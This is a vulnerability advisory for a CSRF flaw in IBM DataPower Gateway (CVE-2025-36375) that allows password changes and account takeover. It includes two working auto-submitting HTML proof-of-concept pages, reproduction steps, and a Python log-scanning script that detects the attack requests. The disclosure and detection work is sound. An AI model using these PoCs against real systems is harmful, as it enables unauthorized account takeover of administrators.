
CVE-2025-36375

IBM DataPower Gateway vulnerable to CSRF

Severity: 6.5 (Medium)

CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N

Affected product: IBM DataPower Gateway

Affected versions: 10.5.0, 10.6.0, 10.6CD

Credits: Maciej Włodarczyk & Michał Bartoszuk

IBM DataPower Gateway is vulnerable to cross-site request forgery, which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts.
A cross-site request forgery vulnerability leading to account takeover can be exploited by sending a GET request to the /support.xml endpoint via CSRF. The endpoint is not protected against CSRF attacks and is by default used to enable or disable debug mode.
By changing the GET parameters in the request, it is possible to modify any property of any object to which the currently logged-in user has access. It is therefore possible to change the password of any chosen user by modifying its Password property.

To reproduce the vulnerability:

  1. Create a poc.html file and set the value of the objName field to the username of any existing IBM DataPower local user. The following PoC changes the password of the user testAdmin to Test12345678!test123456789.
    <html>
    <head>
    <meta name="referrer" content="no-referrer">
    </head>
    <body>
    <form action="https://[IBM-DATAPOWER-WEB]/support.xml">
    <input type="hidden" name="action" value="toggle&#45;property" />
    <input type="hidden" name="class" value="User" />
    <input type="hidden" name="classDisplay" value="whatever" />
    <input type="hidden" name="objName" value="testAdmin" />
    <input type="hidden" name="property" value="Password" />
    <input type="hidden" name="propDisplay" value="whatever" />
    <input type="hidden" name="toggle" value="Test12345678&#33;test123456789" />
    <input type="submit" value="Submit request" />
    </form>
    <script>
    history.pushState('', '', '/');
    document.forms[0].submit();
    </script>
    </body>
    </html>
  2. Set up an HTTP server with the following command to host the poc.html file:
    python3 -m http.server
  3. While logged in as an IBM DataPower admin user, go to http://localhost:8000/poc.html to trigger the CSRF attack. The PoC sends a GET request to:
    http://[IBM-DATAPOWER-WEB]/support.xml?action=toggle-property&class=User&classDisplay=whatever&objName=testAdmin&property=Password&propDisplay=whatever&toggle=Test12345678%21test123456789
Image 1: Successfully triggered CSRF attack

The password of the testAdmin user is changed. To confirm the account takeover, log in with the changed password.

Image 2: Successful account takeover via CSRF

To increase the success rate of the attack, an attacker can first switch the victim's session from a custom domain to the default domain via another CSRF attack, using the following PoC:

    <html>
    <head>
    <meta name="referrer" content="no-referrer">
    </head>
    <body>
    <form action="https://[IBM-DATAPOWER-WEB]/">
    <input type="hidden" name="action" value="switch&#45;domain" />
    <input type="hidden" name="requestDomain" value="default" />
    <input type="submit" value="Submit request" />
    </form>
    <script>
    history.pushState('', '', '/');
    document.forms[0].submit();
    </script>
    </body>
    </html>
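As an added detection example (not part of the advisory), the following Python script scans access-log lines in combined log format for the two request shapes described above: a GET to /support.xml toggling the Password property, and a switch-domain request arriving without a same-origin Referer, which is what the no-referrer PoC pages produce. The gateway hostname, client IPs, the sample log lines and the ExampleClass/ExampleProperty names are constructed, not values from the advisory.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined log format: client ident user [time] "method target proto" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Properties whose change through /support.xml means account impact (Password, per the advisory).
SENSITIVE_PROPERTIES = {"Password"}

def analyse_line(line, gateway_host):
    """Return (severity, message) findings for one access-log line; empty list if benign or unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return []
    parts = urlsplit(m.group("target"))
    params = {k: v[0] for k, v in parse_qs(parts.query).items()}
    referer = m.group("referer")
    # The PoC pages set referrer-policy no-referrer, so a missing Referer ("-") is treated like a foreign one.
    cross_site = referer == "-" or urlsplit(referer).netloc != gateway_host
    findings = []
    if parts.path == "/support.xml" and params.get("action") == "toggle-property":
        prop = params.get("property", "")
        if prop in SENSITIVE_PROPERTIES:
            findings.append(("HIGH", f"{prop} change on {params.get('class')}/{params.get('objName')} via GET"))
        if cross_site:
            findings.append(("MEDIUM", "support.xml toggle-property without same-origin Referer"))
    if params.get("action") == "switch-domain" and cross_site:
        findings.append(("MEDIUM", f"domain switch to {params.get('requestDomain')!r} without same-origin Referer"))
    return findings

def scan(lines, gateway_host):
    """Map line index -> findings for every line that produced any."""
    return {i: f for i, line in enumerate(lines) if (f := analyse_line(line, gateway_host))}

# Constructed sample lines: hostname, IPs and ExampleClass/ExampleProperty are assumed values, not from the advisory.
GATEWAY_HOST = "datapower.example.internal"
SAMPLE_LOG = [
    '10.0.0.5 - admin [06/Mar/2026:10:00:01 +0000] "GET /support.xml?action=toggle-property&class=User&classDisplay=whatever'
    '&objName=testAdmin&property=Password&propDisplay=whatever&toggle=REDACTED HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.5 - admin [06/Mar/2026:09:59:58 +0000] "GET /?action=switch-domain&requestDomain=default HTTP/1.1"'
    ' 302 0 "-" "Mozilla/5.0"',
    '10.0.0.7 - admin [06/Mar/2026:09:30:00 +0000] "GET /support.xml?action=toggle-property&class=ExampleClass&objName=obj1'
    '&property=ExampleProperty&toggle=on HTTP/1.1" 200 512 "https://datapower.example.internal/" "Mozilla/5.0"',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG, GATEWAY_HOST))
```

The third sample line, a same-origin toggle of a non-sensitive property, produces no finding, so legitimate use of the endpoint from the gateway UI is not flagged.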
  • 03-10-2025 - Vulnerability reported to vendor
  • 01-04-2026 - Security advisory is published by the vendor
  • 03-06-2026 - PoC published